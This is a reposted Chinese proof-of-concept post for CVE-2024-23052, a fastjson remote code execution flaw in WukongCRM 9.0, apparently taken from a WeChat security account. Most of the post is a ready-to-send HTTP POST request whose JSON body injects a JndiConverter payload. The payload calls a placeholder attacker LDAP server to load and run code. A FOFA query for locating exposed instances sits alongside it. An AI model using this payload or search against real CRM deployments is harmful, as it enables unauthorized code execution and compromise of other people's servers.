悟空CRM9.0-fastjson远程代码执行漏洞(CVE-2024-23052)
WuKongOpenSource WukongCRM v.72crm_9.0.1_20191202 中的一个问题允许远程攻击者通过 fastjson 组件中的 parseObject() 函数执行任意代码。
fofa
"悟空CRM"poc
POST /CrmCustomer/queryPageList HTTP/1.1Host: localhost:8080Content-Length: 115Content-Type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: close
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"
原文始发于微信公众号(CISSP):CVE-2024-23052 POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论